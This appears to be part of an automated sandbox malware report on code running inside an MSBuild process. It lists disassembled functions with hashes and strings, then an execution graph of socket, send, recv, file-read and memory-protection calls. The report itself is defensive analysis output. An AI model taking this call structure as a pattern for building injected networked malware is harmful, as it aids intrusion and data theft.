                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA90023A20141403E100715C6508707001597D0205F55D451F0424558DD65699556222
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6c5255b7a3f7a46724a1377bfd091cc3672117d3d42a07109afc641e355e9d78
                                                                                                                                                                                                                                                                  • Instruction ID: bf5f983d6910cd57b876464d3845df34861e6770708f50095733c92f262a2f18
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c5255b7a3f7a46724a1377bfd091cc3672117d3d42a07109afc641e355e9d78
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A90022A60541402E140715C6418706002597D0205F55D051F0024554DC6599B5967A2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d865a75f0265179ed7a0fb6ae2ef90ce8b414bd788ee793c967b57745e82da95
                                                                                                                                                                                                                                                                  • Instruction ID: 5203f1f7723b2e44ad3cb4a2debe96ac788833fd76bb2ec3c30ac5bf656416bf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d865a75f0265179ed7a0fb6ae2ef90ce8b414bd788ee793c967b57745e82da95
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4190026A21141042E104715C5404706005597E1205F55C052F2154554CC5299D655226
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5a94de6f6ec1629c8a6c72a1725beb586b3219e2d3f5f185e28b660e93b01bb0
                                                                                                                                                                                                                                                                  • Instruction ID: c557aad5b8e446bb913b291a033e605624f821b49f755b5c10043ee685b336b1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a94de6f6ec1629c8a6c72a1725beb586b3219e2d3f5f185e28b660e93b01bb0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D90023A20181402E100715C5808747001597D0306F55C051F5164555EC665D9956632
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fef06dd4e7e6020b7f3e95385569810e46926c93bbf4c4f6e486c50a3b005b1a
                                                                                                                                                                                                                                                                  • Instruction ID: 4b6c5b156b8a2410bf7dbe7488026f7d3f9bf0adbb0b04b43b878992f25b35c8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef06dd4e7e6020b7f3e95385569810e46926c93bbf4c4f6e486c50a3b005b1a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F090022A30141402E102715C54146060019D7D1349F95C052F1424555DC6259A57A233
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 60be82a59c3bf5df3d97c90ceb8fa22dc6872af9ff48ebfef6edc446cf440045
                                                                                                                                                                                                                                                                  • Instruction ID: b720e8cc25154aa5215c99c9d30646ce91eebd3b7f4c260460ba12fef99e085d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60be82a59c3bf5df3d97c90ceb8fa22dc6872af9ff48ebfef6edc446cf440045
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3890026A20181403E140755C5804607001597D0306F55C051F2064555ECA299D556236
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                  • Instruction ID: 59cc1895e2f20b9005340f141a00274db6a462db0acb6577aa28f9632b10889b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                                                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                                  • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                                  • Opcode ID: b48aa754bc3ad43d9c38c90bba3eed82b339669fd1e789496ba27c1d742cb61b
                                                                                                                                                                                                                                                                  • Instruction ID: c54cc5571f558b81672ff59b53ddc56249f4baec9430b53cd51933ff5caf406c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b48aa754bc3ad43d9c38c90bba3eed82b339669fd1e789496ba27c1d742cb61b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C51E9B6A00256BFDB11DB9C889097FFBB8BB08648B14C12DF5A9D7641D734DE5087A0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 013F4655
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 013F4725
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 013F4787
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 013F46FC
                                                                                                                                                                                                                                                                  • Execute=1, xrefs: 013F4713
                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 013F4742
                                                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 013F46A0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                                                  • Opcode ID: e49c017e20835a71c20f6e8dfa67d7beab71a9b4d0520f9027389b30edc1eaac
                                                                                                                                                                                                                                                                  • Instruction ID: 873a4b99405459023582e9e7f13b816d4bb4cd4d45cde4d106c8ccdd24a0fcb6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e49c017e20835a71c20f6e8dfa67d7beab71a9b4d0520f9027389b30edc1eaac
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F5128316002196AEF21ABA9DCC5FFA77ACEB94718F0400ADD705AB6D0F7719E458B50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                                                                                                  • String ID: +$-$0$0
                                                                                                                                                                                                                                                                  • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                                                                                  • Instruction ID: 52db969d3ecfa4d666bba16cfa85be2d04444ca64b144508322d714813504a49
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA81DF70E012498EEF258E6CC8927FEFFB5AF44BA8F18411DD861A7299C7348C508B61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 013F7B7F
                                                                                                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 013F7B8E
                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 013F7BAC
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                                  • API String ID: 0-871070163
                                                                                                                                                                                                                                                                  • Opcode ID: 78a3a9ef30ebb3cc62b2b71656be230a25ebc6aaf16e193fce7ed4eb25a34857
                                                                                                                                                                                                                                                                  • Instruction ID: 9e0344618e4da73dec81dee1c98ac7381db622669f233100414aedec6c3bac16
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78a3a9ef30ebb3cc62b2b71656be230a25ebc6aaf16e193fce7ed4eb25a34857
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B74119313047064FD721CE29DC80B66B7E5EF99714F00092DFA56D7A90EB31E805CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F728C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 013F7294
                                                                                                                                                                                                                                                                  • RTL: Resource at %p, xrefs: 013F72A3
                                                                                                                                                                                                                                                                  • RTL: Re-Waiting, xrefs: 013F72C1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                                  • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                                  • Opcode ID: f9a09b54bbfa6452034989f2765a3b1da3021dedf0bbc2597d6a019391e1a2e9
                                                                                                                                                                                                                                                                  • Instruction ID: 34522bae4ce5080b55cf74cc2c5f51ee3cbce8715008e60029ca49ab4420c58d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a09b54bbfa6452034989f2765a3b1da3021dedf0bbc2597d6a019391e1a2e9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3410335700206ABD721DE29CC81FAAB7A5FB54718F10062DFA55AB680EB31F80687D1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: __aulldvrm
                                                                                                                                                                                                                                                                  • String ID: +$-
                                                                                                                                                                                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                                                                                  • Instruction ID: 3792fe0f26eedb7b80460be3dfdcd9ca7b309cf9d133cead4673a4fab1d7681b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C91A071E0021A9BEB24DF6DC881ABEBBA5AF44B28F14451EED55E72C0EB309D458F11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01389126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                                                                                                  • Opcode ID: 9e5c07b69784411bd376fa43a1f46d6c15a87763b17946cc24005acafcd01c65
                                                                                                                                                                                                                                                                  • Instruction ID: 5464c1d3d14b27863dce108a41d0962718a6929d6dad8f714e85c6e4d0a0a543
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e5c07b69784411bd376fa43a1f46d6c15a87763b17946cc24005acafcd01c65
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58810C71D00269DBDB35DB58CD44BEEB7B8AB48718F0041DAEA19B7690D7705E84CFA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                  Execution Coverage:2.5%
                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                  Signature Coverage:5.5%
                                                                                                                                                                                                                                                                  Total number of Nodes:454
                                                                                                                                                                                                                                                                  Total number of Limit Nodes:16
                                                                                                                                                                                                                                                                  execution_graph 13498 b411f82 13499 b411fb8 13498->13499 13502 b412081 13499->13502 13511 b412022 13499->13511 13512 b40e5b2 13499->13512 13501 b412134 13510 b4121b2 13501->13510 13501->13511 13515 b40e732 13501->13515 13502->13501 13504 b412117 getaddrinfo 13502->13504 13502->13511 13504->13501 13506 b412729 13507 b412756 SleepEx 13506->13507 13509 b41275d 13506->13509 13507->13509 13508 b4127f4 setsockopt recv 13508->13511 13509->13508 13509->13511 13510->13511 13518 b40e6b2 13510->13518 13513 b40e60a socket 13512->13513 13514 b40e5ec 13512->13514 13513->13502 13514->13513 13516 b40e788 connect 13515->13516 13517 b40e76a 13515->13517 13516->13510 13517->13516 13519 b40e705 send 13518->13519 13520 b40e6e7 13518->13520 13519->13506 13520->13519 13765 b40b14a 13766 b40b153 13765->13766 13771 b40b174 13765->13771 13767 b40d382 ObtainUserAgentString 13766->13767 13769 b40b16c 13767->13769 13768 b40b1e7 13770 b4060f2 7 API calls 13769->13770 13770->13771 13771->13768 13773 b4061f2 13771->13773 13774 b4062c9 13773->13774 13775 b40620f 13773->13775 13774->13771 13776 b410f12 9 API calls 13775->13776 13778 b406242 13775->13778 13776->13778 13777 b406289 13777->13774 13780 b4060f2 7 API calls 13777->13780 13778->13777 13779 b407432 2 API calls 13778->13779 13779->13777 13780->13774 13874 b412e0a 13875 b411942 13874->13875 13876 b412e45 NtProtectVirtualMemory 13875->13876 13877 b412e70 13876->13877 13866 b413a4d 13867 b413a53 13866->13867 13870 b407782 13867->13870 13869 b413a6b 13871 b40778f 13870->13871 13872 b4077ad 13871->13872 13873 b40c662 7 API calls 13871->13873 13872->13869 13873->13872 13521 b412e12 13522 b412e45 NtProtectVirtualMemory 13521->13522 13525 b411942 13521->13525 13524 b412e70 13522->13524 13526 b411967 13525->13526 13526->13522 13878 b407613 13880 b407620 13878->13880 13879 b407684 13880->13879 13881 b412e12 NtProtectVirtualMemory 13880->13881 13881->13880 13910 b40bcd4 13912 b40bcd8 13910->13912 13911 b40c022 13912->13911 13916 b40b352 13912->13916 13914 b40bf0d 13914->13911 13925 b40b792 13914->13925 13917 b40b39e 13916->13917 13918 b40b58e 13917->13918 13919 b40b4ec 13917->13919 13921 b40b595 13917->13921 13918->13914 13920 b411232 2 API calls 13919->13920 13923 b40b4ff 13920->13923 13921->13918 13922 b411232 2 API calls 13921->13922 13922->13918 13923->13918 13924 b411232 2 API calls 13923->13924 13924->13918 13926 b40b7e0 13925->13926 13927 b411232 2 API calls 13926->13927 13930 b40b90c 13927->13930 13928 b40baf3 13928->13914 13929 b40b352 NtCreateFile NtReadFile 13929->13930 13930->13928 13930->13929 13931 b40b602 NtCreateFile NtReadFile 13930->13931 13931->13930 13806 b409dd9 13808 b409df0 13806->13808 13807 b409ecd 13808->13807 13809 b40d382 ObtainUserAgentString 13808->13809 13809->13807 13679 b4062dd 13682 b40631a 13679->13682 13680 b4063fa 13681 b406328 SleepEx 13681->13681 13681->13682 13682->13680 13682->13681 13686 b410f12 13682->13686 13695 b407432 13682->13695 13705 b4060f2 13682->13705 13688 b410f48 13686->13688 13687 b411134 13687->13682 13688->13687 13689 b4110e9 13688->13689 13693 b411232 NtCreateFile NtReadFile 13688->13693 13711 b411f82 13688->13711 13691 b411125 13689->13691 13725 b410842 13689->13725 13733 b410922 13691->13733 13693->13688 13696 b40745b 13695->13696 13703 b4074c9 13695->13703 13697 b411232 2 API calls 13696->13697 13696->13703 13698 b407496 13697->13698 13699 b4074c5 13698->13699 13747 b407082 13698->13747 13700 b411232 2 API calls 13699->13700 13699->13703 13700->13703 13702 b4074b6 13702->13699 13756 b406f52 13702->13756 13703->13682 13706 b406109 13705->13706 13710 b4061d3 13705->13710 13761 b406012 13706->13761 13708 b406113 13709 b411f82 7 API calls 13708->13709 13708->13710 13709->13710 13710->13682 13712 b411fb8 13711->13712 13713 b40e5b2 socket 13712->13713 13715 b412081 13712->13715 13724 b412022 13712->13724 13713->13715 13714 b412134 13716 b40e732 connect 13714->13716 13723 b4121b2 13714->13723 13714->13724 13715->13714 13717 b412117 getaddrinfo 13715->13717 13715->13724 13716->13723 13717->13714 13718 b40e6b2 send 13719 b412729 13718->13719 13720 b412756 SleepEx 13719->13720 13722 b41275d 13719->13722 13720->13722 13721 b4127f4 setsockopt recv 13721->13724 13722->13721 13722->13724 13723->13718 13723->13724 13724->13688 13726 b41086d 13725->13726 13741 b411232 13726->13741 13728 b410906 13728->13689 13729 b410888 13729->13728 13730 b411f82 7 API calls 13729->13730 13731 b4108c5 13729->13731 13730->13731 13731->13728 13732 b411232 2 API calls 13731->13732 13732->13728 13734 b4109c2 13733->13734 13735 b411232 2 API calls 13734->13735 13739 b4109d6 13735->13739 13736 b410a9f 13736->13687 13737 b410a5d 13737->13736 13738 b411232 2 API calls 13737->13738 13738->13736 13739->13736 13739->13737 13740 b411f82 7 API calls 13739->13740 13740->13737 13742 b41125c 13741->13742 13746 b411334 13741->13746 13743 b411410 NtCreateFile 13742->13743 13742->13746 13744 b41145d 13743->13744 13745 b4115e9 NtReadFile 13744->13745 13744->13746 13745->13746 13746->13729 13748 b407420 13747->13748 13749 b4070aa 13747->13749 13748->13702 13749->13748 13750 b411232 2 API calls 13749->13750 13752 b4071f9 13750->13752 13751 b4073df 13751->13702 13752->13751 13753 b411232 2 API calls 13752->13753 13754 b4073c9 13753->13754 13755 b411232 2 API calls 13754->13755 13755->13751 13757 b406f70 13756->13757 13758 b406f84 13756->13758 13757->13699 13759 b411232 2 API calls 13758->13759 13760 b407046 13759->13760 13760->13699 13763 b406031 13761->13763 13762 b4060cd 13762->13708 13763->13762 13764 b411f82 7 API calls 13763->13764 13764->13762 13932 b409edd 13934 b409f06 13932->13934 13933 b409fa4 13934->13933 13935 b4068f2 NtProtectVirtualMemory 13934->13935 13936 b409f9c 13935->13936 13937 b40d382 ObtainUserAgentString 13936->13937 13937->13933 13882 b413a1f 13883 b413a25 13882->13883 13886 b4075f2 13883->13886 13885 b413a3d 13887 b4075fb 13886->13887 13888 b40760e 13886->13888 13887->13888 13889 b40c662 7 API calls 13887->13889 13888->13885 13889->13888 13938 b40bce2 13939 b40bdd9 13938->13939 13940 b40c022 13939->13940 13941 b40b352 2 API calls 13939->13941 13942 b40bf0d 13941->13942 13942->13940 13943 b40b792 2 API calls 13942->13943 13943->13942 13944 b40e2e4 13945 b40e36f 13944->13945 13946 b40e305 13944->13946 13946->13945 13947 b40e0c2 7 API calls 13946->13947 13947->13945 13781 b408b66 13783 b408b6a 13781->13783 13782 b408cce 13783->13782 13784 b408cb5 CreateMutexW 13783->13784 13784->13782 13982 b413aa9 13983 b413aaf 13982->13983 13986 b40e212 13983->13986 13985 b413ac7 13987 b40e237 13986->13987 13988 b40e21b 13986->13988 13987->13985 13988->13987 13989 b40e0c2 7 API calls 13988->13989 13989->13987 13890 b40d22a 13891 b40d25e 13890->13891 13892 b40c8c2 ObtainUserAgentString 13891->13892 13893 b40d26b 13892->13893 13533 b412bac 13534 b412bb1 13533->13534 13567 b412bb6 13534->13567 13568 b408b72 13534->13568 13536 b412c2c 13537 b412c85 13536->13537 13539 b412c54 13536->13539 13540 b412c69 13536->13540 13536->13567 13538 b410ab2 NtProtectVirtualMemory 13537->13538 13543 b412c8d 13538->13543 13544 b410ab2 NtProtectVirtualMemory 13539->13544 13541 b412c80 13540->13541 13542 b412c6e 13540->13542 13541->13537 13546 b412c97 13541->13546 13545 b410ab2 NtProtectVirtualMemory 13542->13545 13604 b40a102 13543->13604 13548 b412c5c 13544->13548 13549 b412c76 13545->13549 13550 b412c9c 13546->13550 13551 b412cbe 13546->13551 13590 b409ee2 13548->13590 13596 b409fc2 13549->13596 13572 b410ab2 13550->13572 13554 b412cc7 13551->13554 13555 b412cd9 13551->13555 13551->13567 13557 b410ab2 NtProtectVirtualMemory 13554->13557 13560 b410ab2 NtProtectVirtualMemory 13555->13560 13555->13567 13559 b412ccf 13557->13559 13614 b40a2f2 13559->13614 13561 b412ce5 13560->13561 13632 b40a712 13561->13632 13570 b408b93 13568->13570 13569 b408cce 13569->13536 13570->13569 